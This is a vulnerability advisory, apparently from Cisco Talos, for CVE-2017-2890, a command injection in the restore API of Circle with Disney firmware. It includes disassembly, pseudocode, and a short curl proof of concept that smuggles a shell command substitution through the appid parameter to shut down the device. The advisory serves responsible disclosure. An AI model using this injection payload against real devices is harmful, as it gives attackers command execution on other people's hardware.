CVE-2017-2890
An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request trigger this vulnerability.
Circle with Disney 2.0.1
9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-77: Improper Neutralization of Special Elements used in a Command (‘Command Injection’)
The vulnerable code exists in the restore api handler of the “apid” deamon (“/api/CONFIG/restore”), function sub_417528
:
.text:004176A4 loc_4176A4:
.text:004176A4 lw $v0, (dword_44CB3C - 0x450000)($v0)
.text:004176A8 nop
.text:004176AC beqz $v0, loc_4177A8
.text:004176B0 li $v0, 1
.text:004176B4 beq $s4, $v0, loc_417860
.text:004176B8 lui $a0, 0x43
.text:004176BC jal strlen
.text:004176C0 addiu $a0, $s6, (byte_44CC40 - 0x450000)
.text:004176C4 sltiu $v0, 0x14
.text:004176C8 bnez $v0, loc_4177A8
.text:004176CC lui $v0, 0x45
.text:004176D0 la $v0, byte_44CC40 # appid
.text:004176D4 sw $v0, 0x200+var_1F0($sp)
.text:004176D8 lui $a2, 0x43
.text:004176DC li $v0, 0x42
.text:004176E0 lui $a3, 0x43
.text:004176E4 addiu $a0, $sp, 0x200+var_148
.text:004176E8 li $a1, 0x80
.text:004176EC la $a2, aSrestore_backu # "%srestore_backup.sh /tmp/postfile.bin %s %d"
.text:004176F0 la $a3, aMntSharesUs_19 # "/mnt/shares/usr/bin/scripts/"
.text:004176F4 jal snprintf
.text:004176F8 sw $v0, 0x200+var_1EC($sp)
.text:004176FC jal system
.text:00417700 addiu $a0, $sp, 0x200+var_148
Looking at the pseudocode of the whole function, we see the following:
if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0)
if (stat("/mnt/shares/usr/bin/app_list") == 0)
if (auth_token[0] != 0 && check_token(auth_token))
if (strlen(appid) > 20) {
snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d", "/mnt/shares/usr/bin/scripts/", appid, 66);
system(cmd);
}
As we can see the appid
parameter, coming from the user as a multipart parameter, is passed direcly to system
call without any sanitization leading in that way to command injection.
This API is accessible for authenticated users.
The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs use a valid token in order to trigger the vulnerability.
$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")');
$ touch empty
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"
2017-08-29 - Vendor Disclosure
2017-10-31 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.